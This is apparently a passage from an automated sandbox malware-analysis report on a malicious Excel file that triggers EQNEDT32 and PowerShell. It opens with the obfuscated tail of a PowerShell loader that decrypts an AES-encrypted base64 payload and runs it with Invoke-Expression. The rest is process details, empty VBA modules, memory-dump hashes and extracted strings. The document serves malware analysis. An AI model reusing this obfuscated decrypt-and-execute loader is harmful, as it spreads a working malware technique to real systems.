Es0Wp/cxDN70mUygsZqxqn+LYilh1wVOfattE8/DMGxR5Edat/CxJndrUfDR9nAWVKhHOI/IYjBgfEpQik9qJZhHmSR22aVO600gw==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePLACe e4jTMIe4j,[CHar]36)AQMinvOKe-EXpReSsion') -CREplacE 'e4j',[Char]39 -CREplacE([Char]65+[Char]81+[Char]77),[Char]124)|&( $verbosEPREFerEncE.tosTriNg()[1,3]+'x'-join'')
      Imagebase:0x830000
      File size:427'008 bytes
      MD5 hash:EB32C070E658937AA9FA9F3AE629B2B8
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high
      Has exited:true

      Call Graph

      • Entrypoint
      • Decryption Function
      • Executed
      • Not Executed
      • Show Help
      callgraph 1 Error: Graph is empty

      Module: Sheet1

      Declaration
      LineContent
      1

      Attribute VB_Name = "Sheet1"

      2

      Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

      3

      Attribute VB_GlobalNameSpace = False

      4

      Attribute VB_Creatable = False

      5

      Attribute VB_PredeclaredId = True

      6

      Attribute VB_Exposed = True

      7

      Attribute VB_TemplateDerived = False

      8

      Attribute VB_Customizable = True

      Module: Sheet2

      Declaration
      LineContent
      1

      Attribute VB_Name = "Sheet2"

      2

      Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

      3

      Attribute VB_GlobalNameSpace = False

      4

      Attribute VB_Creatable = False

      5

      Attribute VB_PredeclaredId = True

      6

      Attribute VB_Exposed = True

      7

      Attribute VB_TemplateDerived = False

      8

      Attribute VB_Customizable = True

      Module: Sheet3

      Declaration
      LineContent
      1

      Attribute VB_Name = "Sheet3"

      2

      Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

      3

      Attribute VB_GlobalNameSpace = False

      4

      Attribute VB_Creatable = False

      5

      Attribute VB_PredeclaredId = True

      6

      Attribute VB_Exposed = True

      7

      Attribute VB_TemplateDerived = False

      8

      Attribute VB_Customizable = True

      Module: ThisWorkbook

      Declaration
      LineContent
      1

      Attribute VB_Name = "ThisWorkbook"

      2

      Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"

      3

      Attribute VB_GlobalNameSpace = False

      4

      Attribute VB_Creatable = False

      5

      Attribute VB_PredeclaredId = True

      6

      Attribute VB_Exposed = True

      7

      Attribute VB_TemplateDerived = False

      8

      Attribute VB_Customizable = True

      Reset < >
        Memory Dump Source
        • Source File: 00000008.00000002.440000620.000000000058F000.00000004.00000020.00020000.00000000.sdmp, Offset: 0058F000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_8_2_58f000_EQNEDT32.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 0587fb9a0d8a93f801515af4f9e32601d9cd9c6b124a95e55a920f40002bfef3
        • Instruction ID: cc35442443322a3f9f0e9c81112272f0ed95f9476a8f794c7ab94de65399bd93
        • Opcode Fuzzy Hash: 0587fb9a0d8a93f801515af4f9e32601d9cd9c6b124a95e55a920f40002bfef3
        • Instruction Fuzzy Hash: 5762D71145E3C14FE74BA731586A2813FB25E631A4F9E95EFC4C0DF9A3E21A494EC722
        Strings
        Memory Dump Source
        • Source File: 0000000A.00000002.538355361.0000000000810000.00000040.00000800.00020000.00000000.sdmp, Offset: 00810000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_10_2_810000_powershell.jbxd
        Similarity
        • API ID:
        • String ID: 4'p$4'p$$p$$p$$p
        • API String ID: 0-2334450948
        • Opcode ID: 6b8f7ef9f55a0660f7a8facdb3d0478160f32a7cffa15f497790643f44b595d6
        • Instruction ID: 602d45f3f60d507098ece0b4f8846f8af6e69640c65ce361d359147d360c6620
        • Opcode Fuzzy Hash: 6b8f7ef9f55a0660f7a8facdb3d0478160f32a7cffa15f497790643f44b595d6
        • Instruction Fuzzy Hash: 4661E371B002058FDB248A78A410BEABBABFFD5314F24903AC549DB295DE75CC81C7A2
        Memory Dump Source
        • Source File: 0000000A.00000002.538324240.0000000000740000.00000040.00000800.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_10_2_740000_powershell.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: eaba84cd49f357aed48125e18d0d79d7bbc51dadbe77ed0d7c33d20eca9a640b
        • Instruction ID: 2a694136a251c18297afcab8c95ac8fb643791ff442fdffa9b76e487245d452c
        • Opcode Fuzzy Hash: eaba84cd49f357aed48125e18d0d79d7bbc51dadbe77ed0d7c33d20eca9a640b
        • Instruction Fuzzy Hash: 2A224B34A01258EFDB15CFA8D484A9DFBF2BF48310F658559E408AB362C775ED86CB90
        Memory Dump Source
        • Source File: 0000000A.00000002.538324240.0000000000740000.00000040.00000800.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_10_2_740000_powershell.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 372b83025f12f3fe21f5322066a5a18c2569616e38f22845026ac692b0dea906
        • Instruction ID: 018e585ef544f89f8e8f19688a440967391501de767aaf1f9d27a716789f3066
        • Opcode Fuzzy Hash: 372b83025f12f3fe21f5322066a5a18c2569616e38f22845026ac692b0dea906
        • Instruction Fuzzy Hash: 5751FA74A00218AFDB15CBA8D484AADFBF2BF88314F24C559E408AB355C775ED86CB90
        Memory Dump Source
        • Source File: 0000000A.00000002.538324240.0000000000740000.00000040.00000800.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_10_2_740000_powershell.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 4fd4f61c4c66c70904c6dadc69bdd8826a1ad465bb466a8ed47a6d608b88ebd5
        • Instruction ID: 5ed54b5d841df94e2cbdf15b231e530cc41b683925875761b150aa60d02a41e0
        • Opcode Fuzzy Hash: 4fd4f61c4c66c70904c6dadc69bdd8826a1ad465bb466a8ed47a6d608b88ebd5
        • Instruction Fuzzy Hash: 9511E674A00209EFDB45CBA8D484B9DBBF6BF48314F24C559E808AB361C775ED86CB90
        Memory Dump Source
        • Source File: 0000000A.00000002.538248564.000000000022D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0022D000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_10_2_22d000_powershell.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 91579295341266738b6e6c8c0a326d6cc46133f8fbbc872ea09b1ebc27add737
        • Instruction ID: 5ee5cea53541b4f8d84033a5001f692313102d629cc7f804709a0aa53b0f1753
        • Opcode Fuzzy Hash: 91579295341266738b6e6c8c0a326d6cc46133f8fbbc872ea09b1ebc27add737
        • Instruction Fuzzy Hash: 4601407144D3D06FD7124B659C94762BFA4DF43724F1984DBE8848F2A7C2689C45CB71
        Memory Dump Source
        • Source File: 0000000A.00000002.538248564.000000000022D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0022D000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_10_2_22d000_powershell.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: ee503536a50959c853caea40333a1373cd446979553a69afd2b7e5f890770568
        • Instruction ID: 79458b4ff0c20a743150db52e3e6f81cf1323664d803ef943c4bb2043e216c36
        • Opcode Fuzzy Hash: ee503536a50959c853caea40333a1373cd446979553a69afd2b7e5f890770568
        • Instruction Fuzzy Hash: 5201F771414350BAE7104E55D884B66BFD8EF41324F18C41AEC444F296C2B9DD45CAB1
        Memory Dump Source
        • Source File: 0000000A.00000002.538324240.0000000000740000.00000040.00000800.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_10_2_740000_powershell.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: ad4d9ec687f9a99e9da3ff3cb7e60a1c9c2d09fa9c402a82e18e8b417c7c3cb4
        • Instruction ID: 3010af6e86f4ca12b42c99245c998438e21a11b20b1141994ecf9cea93855c5d
        • Opcode Fuzzy Hash: ad4d9ec687f9a99e9da3ff3cb7e60a1c9c2d09fa9c402a82e18e8b417c7c3cb4
        • Instruction Fuzzy Hash: 9701F770A002409FCB108FA8C8409BDFB36FF893107344089D54597262CB35AC52C791
        Memory Dump Source
        • Source File: 0000000A.00000002.538355361.0000000000810000.00000040.00000800.00020000.00000000.sdmp, Offset: 00810000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_10_2_810000_powershell.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 2a9b267d9aa2e777e6850164d760ed1ef1753fa9effe46eebebb7b7369b40aa8
        • Instruction ID: 721284d1eb13be3085087680da02792adb0eb4cd2433618b3944324a5765707d
        • Opcode Fuzzy Hash: 2a9b267d9aa2e777e6850164d760ed1ef1753fa9effe46eebebb7b7369b40aa8
        • Instruction Fuzzy Hash: F7F0227075030C3BCA206665981AF7F28AAEFC8B08F60802CF505EF3C1CDB6AC8143A1
        Strings
        Memory Dump Source
        • Source File: 0000000A.00000002.538355361.0000000000810000.00000040.00000800.00020000.00000000.sdmp, Offset: 00810000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_10_2_810000_powershell.jbxd
        Similarity
        • API ID:
        • String ID: 4'p$4'p$4:y$4:y$8#f$8#f$8#f$8#f$8#f$8#f$$p$$p$$p$$p$9y$9y
        • API String ID: 0-3659856223
        • Opcode ID: c968c71afb0165834e95ed0639bc2088e34acc64f42a08fed6267c824601c8f2
        • Instruction ID: 083ae2f1fc8fd567c50f16014ca25664dd6e31fe9867a2ed640cc03bf79e6faa
        • Opcode Fuzzy Hash: c968c71afb0165834e95ed0639bc2088e34acc64f42a08fed6267c824601c8f2
        • Instruction Fuzzy Hash: 93C10635B042059FCF149F68D848AAAFBEAFFD4314B28C47ADA45CB245DA31CD81C791
        Strings
        Memory Dump Source
        • Source File: 0000000A.00000002.538355361.0000000000810000.00000040.00000800.00020000.00000000.sdmp, Offset: 00810000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_10_2_810000_powershell.jbxd
        Similarity
        • API ID:
        • String ID: 4'p$4'p$L4p$L4p$L4p$L4p$L4p$L4p$`8y$`8y$`8y$$p$$p
        • API String ID: 0-3133623349
        • Opcode ID: 70b354270537e50e7b158b36b1064bb2144887c937ee7d4d0fb188ea2444e238
        • Instruction ID: 42a52d480cd616901bfec3a25c66718ff586244d6743904beee47e9a91a7c196
        • Opcode Fuzzy Hash: 70b354270537e50e7b158b36b1064bb2144887c937ee7d4d0fb188ea2444e238
        • Instruction Fuzzy Hash: 8DE10831B00208EFDF159A68DC54BAE7BAAFF84314F188066E955DB291CBB1DDC1CB91
        Strings
        Memory Dump Source
        • Source File: 0000000A.00000002.538355361.0000000000810000.00000040.00000800.00020000.00000000.sdmp, Offset: 00810000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_10_2_810000_powershell.jbxd
        Similarity
        • API ID:
        • String ID: 4'p$4'p$$p$$p$$p$$p$$p$$p
        • API String ID: 0-2834719986
        • Opcode ID: 096d8561be8aea4ed9b580b0e7d620fbc2aef1de19618ec568c995b2169649e7
        • Instruction ID: d1fc7c8f8e61e4b7b20d5300175228bc335722e2489e44ea1ed93b48ef4a4e2b
        • Opcode Fuzzy Hash: 096d8561be8aea4ed9b580b0e7d620fbc2aef1de19618ec568c995b2169649e7
        • Instruction Fuzzy Hash: 795135357002159FCB649A69D400ABABBAAFFD5311F28907BD555CB241DF32CCC2C3A1
        Strings
        Memory Dump Source
        • Source File: 0000000A.00000002.538355361.0000000000810000.00000040.00000800.00020000.00000000.sdmp, Offset: 00810000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_10_2_810000_powershell.jbxd
        Similarity
        • API ID:
        • String ID: 4'p$4'p$4'p$4'p$4'p$4'p
        • API String ID: 0-2314922075
        • Opcode ID: 7f2da0435288c98acab04d87c0e3c7f46fb94a9c7b24031869a71a75afabbbeb
        • Instruction ID: 0883a59898ff2392fbdea5680392674a76e4232dcee2976335bde6d2cb068628
        • Opcode Fuzzy Hash: 7f2da0435288c98acab04d87c0e3c7f46fb94a9c7b24031869a71a75afabbbeb
        • Instruction Fuzzy Hash: 71E1F531B043159FCB149E68D854AEABBEAFFC4310F2880AAD545DB255DF71CE81C7A1
        Strings
        Memory Dump Source
        • Source File: 0000000A.00000002.538355361.0000000000810000.00000040.00000800.00020000.00000000.sdmp, Offset: 00810000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_10_2_810000_powershell.jbxd
        Similarity
        • API ID:
        • String ID: L4p$L4p$L4p$\9y
        • API String ID: 0-934775394
        • Opcode ID: 10d1440842bfb1db0ca97239156910074716b894c00b0d5e11b7d1ba98e8f047
        • Instruction ID: b39bc6a60863f9a210880bbb94068074d911475148521d650ec872072c564091
        • Opcode Fuzzy Hash: 10d1440842bfb1db0ca97239156910074716b894c00b0d5e11b7d1ba98e8f047
        • Instruction Fuzzy Hash: B261F335B00208AFCB159A68D810BEE7BAAFF84314F148465E945DB291DBB1EDD1CFA1
        Strings
        Memory Dump Source
        • Source File: 0000000A.00000002.538355361.0000000000810000.00000040.00000800.00020000.00000000.sdmp, Offset: 00810000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_10_2_810000_powershell.jbxd
        Similarity
        • API ID:
        • String ID: 4'p$4'p$X:y$X:y
        • API String ID: 0-3716233069
        • Opcode ID: 495647e19f8f377e9dc76402f809e45bc2336f57101b77f751908f8fce1a9954
        • Instruction ID: b12242888c8f573e78b89046d19b1e6e93c2f71204b412b9c2630c42b8998634
        • Opcode Fuzzy Hash: 495647e19f8f377e9dc76402f809e45bc2336f57101b77f751908f8fce1a9954
        • Instruction Fuzzy Hash: E521C531700315ABCF145A688465BBEBE9BEFC5711F64803AE659CB380CE71CD828391